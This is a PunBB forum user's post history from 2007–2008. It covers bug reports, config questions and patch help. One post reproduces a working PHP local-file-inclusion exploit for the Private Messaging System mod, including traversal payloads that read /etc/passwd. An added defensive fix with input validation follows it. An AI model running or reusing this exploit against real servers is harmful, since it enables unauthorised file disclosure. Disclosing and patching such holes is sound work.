It doesn't work. Dante
1 2008-11-20 17:49
Re: Punbb <= 1.2.19 XSS Vulnerabilities (2 replies, posted in PunBB 1.2 bug reports)
2 2008-11-20 17:47
Re: PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit (4 replies, posted in PunBB 1.2 modifications, plugins and integrations)
register_globals = 1
magic_quotes_gpc = 1
I know, it's rare that they are off... But I'd prefer to be safe with PunBB 1.2.20 Dante
3 2008-11-19 21:34
Topic: PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit (4 replies, posted in PunBB 1.2 modifications, plugins and integrations)
<?php
error_reporting(0);
ini_set("default_socket_timeout",5);
/*
PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
-----------------------------------------------------------
by athos - staker[at]hotmail[dot]it
download mod http://www.punres.org/files.php?pid=52
download cms http://punbb.org
-----------------------------------------------------------
register_globals = 1
magic_quotes_gpc = 1
Directory (files/include/pms)
functions_navlinks.php?pun_user[language]=../../../../../etc/passwd
profile_send.php?pun_user[language]=../../../../../etc/passwd
viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd
../../etc/passwd and nullbyte
File (files/include/pms/functions_navlinks.php)
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared :D you can include any file
functions_navlinks.php?pun_user[language]=../../../etc/passwd%00
-------------------------------------------------------------------
File (files/include/pms/header_new_messages.php)
1. <?php
2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){
3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['g_pm'] isn't declared
$pun_config['o_pms_enabled'] isn't declared
header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00
-------------------------------------------------------------------
File (files/include/pms/profile_send.php))
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared
profile_send.php?pun_user[language]=../../../../etc/passwd%00
-------------------------------------------------------------------
File (files/include/pms/viewtopic_PM-link.php)
1. <?php
2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';
$pun_user['language'] isn't declared
viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00
-------------------------------------------------------------------
Usage: php [punbb.php] [host/path] [mode]
php [punbb.php] [host/path] [save]
php [punbb.php] [host/path] [NULL]
Example:
php punbb.php localhost/punbb save
php punbb.php localhost/punbb
NOTE: Don't add me on MSN Messenger
*/
$exploit = new Exploit;
$domain = $argv[1];
$mymode = $argv[2];
$exploit->starting();
$exploit->is_vulnerable($domain);
$exploit->exploiting($domain,$mymode);
class Exploit
{
function http_request($host,$data)
{
if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP))
{
echo "socket_create() error!\r\n";
exit;
}
if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
{
echo "socket_set_option() error!\r\n";
exit;
}
if(!socket_connect($socket,$host,80))
{
echo "socket_connect() error!\r\n";
exit;
}
if(!socket_write($socket,$data,strlen($data)))
{
echo "socket_write() errror!\r\n";
exit;
}
while($get = socket_read($socket,1024,PHP_NORMAL_READ))
{
$content .= $get;
}
socket_close($socket);
$array = array(
'HTTP/1.1 404 Not Found',
'HTTP/1.1 300 Multiple Choices',
'HTTP/1.1 301 Moved Permanently',
'HTTP/1.1 302 Found',
'HTTP/1.1 304 Not Modified',
'HTTP/1.1 400 Bad Request',
'HTTP/1.1 401 Unauthorized',
'HTTP/1.1 402 Payment Required',
'HTTP/1.1 403 Forbidden',
'HTTP/1.1 405 Method Not Allowed',
'HTTP/1.1 406 Not Acceptable',
'HTTP/1.1 407 Proxy Authentication Required',
'HTTP/1.1 408 Request Timeout',
'HTTP/1.1 409 Conflict',
'HTTP/1.1 410 Gone',
'HTTP/1.1 411 Length Required',
'HTTP/1.1 412 Precondition Failed',
'HTTP/1.1 413 Request Entity Too Large',
'HTTP/1.1 414 Request-URI Too Long',
'HTTP/1.1 415 Unsupported Media Type',
'HTTP/1.1 416 Request Range Not Satisfiable',
'HTTP/1.1 417 Expectation Failed',
'HTTP/1.1 Retry With',
);
for($i=0;$i<=count($array);$i++)
if(eregi($array[$i],$content))
{
return ("$array[$i]\r\n");
break;
}
else
{
return ("$content\r\n");
break;
}
}
function is_vulnerable($host)
{
$host = explode('/',$host);
$header .= "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
$header .= "Host: $host[0]\r\n";
$header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$header .= "Accept-Language: en-us,en;q=0.5\r\n";
$header .= "Accept-Encoding: gzip,deflate\r\n";
$header .= "Connection: close\r\n\r\n";
if(stristr($this->http_request($host[0],$header),"\\'"))
{
echo "[+] Magic Quotes GPC/Register Globals On!\n";
echo "[+] Exploit Failed!\n";
exit;
}
else
{
return false;
}
}
function starting()
{
global $argv;
if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
{
echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
echo "[+] by athos - staker[at]hotmail[dot]it\r\n";
echo " -----------------------------------------------------------\r\n";
echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
echo "[+] Usage: php $argv[0] [host/path] \r\n";
exit;
}
}
function exploiting($host,$mode)
{
$host = explode('/',$host);
$i = 0;
echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
echo "[+] Local File: ";
$file = stripslashes(trim(fgets(STDIN)));
if(empty($file)) die("you fail");
$array = array (
"functions_navlinks.php?pun_user[language]=$file",
"profile_send.php?pun_user[language]=$file",
"viewtopic_PM-link.php?pun_user[language]=$file",
"header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
);
$write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n";
$write .= "Host: $host[0]\r\n";
$write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$write .= "Accept-Language: en-us,en;q=0.5\r\n";
$write .= "Accept-Encoding: gzip,deflate\r\n";
$write .= "Connection: close\r\n\r\n";
if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
{
$i++;
}
else
{
if($mode == "save")
{
$rand = rand(0,99999);
fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
echo "[+] File $rand Saved Successfully!\r\n";
echo "[+] Exploit Terminated!\r\n";
exit;
}
else
{
echo $this->http_request($host[0],$write);
exit;
}
}
}
}
# milw0rm.com [2008-11-19]
I'm not able to fix it... Can someone fix the affected file, please? Dante
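One way to close the hole the advisory above describes, as an added example that is not part of the original post or of the PMS mod's own code: refuse direct requests to the include files, and accept the language value only when it names an installed language pack. The helper name pms_safe_language() and the 'English' fallback are assumptions made for this example.

```php
<?php
// Added example, not PunBB or PMS mod code.
// Goes at the top of each file in files/include/pms/ that builds a path
// from $pun_user['language'].

// 1. Refuse direct requests. config.php does define('PUN', 1), so the
//    constant exists only when the file is included by the forum itself.
//    register_globals creates variables, never constants, so a request
//    parameter cannot satisfy this check.
if (!defined('PUN'))
    exit;

// 2. Never pass the language value to require as-is. Accept it only if it
//    is a plain name and a language pack of that name exists under lang/.
//    pms_safe_language() is a hypothetical helper; 'English' is an assumed
//    fallback language pack.
function pms_safe_language($language, $lang_root, $fallback = 'English')
{
    // Arrays, null bytes, slashes and dots all fail this pattern, so a
    // value such as "../../etc/passwd%00" never reaches the filesystem.
    // The D modifier stops "$" from matching before a trailing newline.
    if (!is_string($language) || !preg_match('/^[A-Za-z0-9_-]+$/D', $language))
        return $fallback;

    // The name must match an installed language pack.
    if (!is_file($lang_root.$language.'/pms.php'))
        return $fallback;

    return $language;
}

$pms_language = pms_safe_language(
    isset($pun_user['language']) ? $pun_user['language'] : '',
    PUN_ROOT.'lang/'
);
require PUN_ROOT.'lang/'.$pms_language.'/pms.php';
```

The advisory lists register_globals = 1 as a precondition, so turning register_globals off in php.ini removes the path by which a request parameter becomes $pun_user in the first place; the guard above still belongs in the files for servers where that setting cannot be changed.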
4 2008-11-14 21:11
Re: Only An Error (4 replies, posted in PunBB 1.2 bug reports)
Sorry... It's right. Dante
5 2008-11-11 20:16
Topic: Only An Error (4 replies, posted in PunBB 1.2 bug reports)
<div id="profile" class="block2col">
<div class="blockmenu">
<h2><span><?php echo $lang_profile['Profile menu'] ?></span></h2>
<div class="box">
<div class="inbox">
<ul>
<li<?php if ($page == 'essentials') echo ' class="isactive"'; ?>><a href="profile.php?section=essentials&id=<?php echo $id ?>"><?php echo $lang_profile['Section essentials'] ?></a></li>
<li<?php if ($page == 'personal') echo ' class="isactive"'; ?>><a href="profile.php?section=personal&id=<?php echo $id ?>"><?php echo $lang_profile['Section personal'] ?></a></li>
<li<?php if ($page == 'messaging') echo ' class="isactive"'; ?>><a href="profile.php?section=messaging&id=<?php echo $id ?>"><?php echo $lang_profile['Section messaging'] ?></a></li>
<li<?php if ($page == 'personality') echo ' class="isactive"'; ?>><a href="profile.php?section=personality&id=<?php echo $id ?>"><?php echo $lang_profile['Section personality'] ?></a></li>
<li<?php if ($page == 'display') echo ' class="isactive"'; ?>><a href="profile.php?section=display&id=<?php echo $id ?>"><?php echo $lang_profile['Section display'] ?></a></li>
<li<?php if ($page == 'privacy') echo ' class="isactive"'; ?>><a href="profile.php?section=privacy&id=<?php echo $id ?>"><?php echo $lang_profile['Section privacy'] ?></a></li>
<?php if ($pun_user['g_id'] == PUN_ADMIN || ($pun_user['g_id'] == PUN_MOD && $pun_config['p_mod_ban_users'] == '1')): ?> <li<?php if ($page == 'admin') echo ' class="isactive"'; ?>><a href="profile.php?section=admin&id=<?php echo $id ?>"><?php echo $lang_profile['Section admin'] ?></a></li>
<?php endif; ?> </ul>
</div>
</div>
</div>
<?php
./include/functions.php
Line: 545 -> 550
<li -> <li>
Dante
6 2008-09-11 13:03
Topic: $this-> (1 replies, posted in PunBB 1.2 bug reports)
Hello... I want to ask you: what is this?
$this->
In the file mysql.php
function query($sql, $unbuffered = false)
{
if (defined('PUN_SHOW_QUERIES'))
$q_start = get_microtime();
if ($unbuffered)
$this->query_result = @mysql_unbuffered_query($sql, $this->link_id);
else
$this->query_result = @mysql_query($sql, $this->link_id);
if ($this->query_result)
{
if (defined('PUN_SHOW_QUERIES'))
$this->saved_queries[] = array($sql, sprintf('%.5f', get_microtime() - $q_start));
++$this->num_queries;
return $this->query_result;
}
else
{
if (defined('PUN_SHOW_QUERIES'))
$this->saved_queries[] = array($sql, 0);
return false;
}
}
I am trying to make a page, but I have this error:
Notice: Undefined variable: this in c:\program files\easyphp1-8\www\prova_tabelle.php on line 64
And on that line there is this PHP code:
60 function num_fields($query_id = 0)
61 {
62 global $db_type;
63 if (!$query_id)
64 $query_id = $this->query_result;
65 switch($db_type)
66 {
67 case 'mysql':
68 return ($query_id) ? @mysql_num_fields($query_id) : false;
69 break;
70 case 'mysqli':
71 return ($query_id) ? @mysqli_num_fields($query_id) : false;
72 }
73 }
Dante
7 2008-06-23 09:01
Re: Bug Priv8 For PunBB (9 replies, posted in PunBB 1.2 bug reports)
thank you... but I want to learn to use the patch... I use windows. Dante
8 2008-06-19 23:35
Re: Bug Priv8 For PunBB (9 replies, posted in PunBB 1.2 bug reports)
This was a bug that was fixed in 1.2.17
Yeah, I saw that later... But how can I use the patch (1.2.15 -> 1.2.17)? I'm not able to apply it... Dante
9 2008-06-16 17:41
Re: Bug Priv8 For PunBB (9 replies, posted in PunBB 1.2 bug reports)
Ok, Thanks. Dante
P.S.: Ehm... I have the 1.2.15 version of PunBB. How can I upgrade my version of PunBB? The patch does not work... And I have to upgrade the Login.php page, but I have installed some of my mods on it... I do not want to replace it with login.php from v1.2.17. Dante
10 2008-06-16 17:18
Topic: Bug Priv8 For PunBB (9 replies, posted in PunBB 1.2 bug reports)
Smartys, I have just sent you an email... Read it, please. Dante
11 2008-01-01 18:27
Re: It Is Not A Bug, Question... (7 replies, posted in PunBB 1.2 discussion)
Ok... Thanks a lot Smartys! Dante
12 2008-01-01 18:08
Re: It Is Not A Bug, Question... (7 replies, posted in PunBB 1.2 discussion)
Oh, I didn't see... But I don't want to see in PHP.net xD xD
$cookie_secure = 1;
Why can't I log in? O.o In a few words xD If I am logged in... I see the forum normally... But if I am not logged in I can't log in O.o Dante
13 2008-01-01 17:56
Re: It Is Not A Bug, Question... (7 replies, posted in PunBB 1.2 discussion)
Yes, but Smartys, answer me please xD Dante
14 2008-01-01 17:48
Topic: It Is Not A Bug, Question... (7 replies, posted in PunBB 1.2 discussion)
<?php
$db_type = 'mysql';
$db_host = 'localhost';
$db_name = 'punbb';
$db_username = 'Dante90';
$db_password = '';
$db_prefix = '';
$p_connect = false;
$cookie_name = 'punbb_cookie';
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'd6ckb5eb';
define('PUN', 1);
What are these for:
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'd6ckb5eb';
? If this:
$cookie_secure = 0;
is:
$cookie_secure = 1;
I can't log in to my forum. Why? And what is $cookie_seed? Dante
15 2007-11-20 15:57
Re: New Exploit For PunBB v1.2.15 (15 replies, posted in PunBB 1.2 bug reports)
Thank you for the thanks. I sent you another email... This time it isn't a dangerous bug xD Dante
16 2007-11-19 14:35
Re: New Exploit For PunBB v1.2.15 (15 replies, posted in PunBB 1.2 bug reports)
But it was the Fix... O__O Dante
17 2007-11-18 20:51
Re: New Exploit For PunBB v1.2.15 (15 replies, posted in PunBB 1.2 bug reports)
[Dante: we know, I've talked to you about this -Smartys]
18 2007-11-03 13:40
Topic: New Exploit For PunBB v1.2.15 (15 replies, posted in PunBB 1.2 bug reports)
I found a Bug on PunBB... It is fatal. I want the fix... I can not post the Exploit, it is dangerous. ADMINS, contact me... dante90.dmc4@hotmail.it... Dante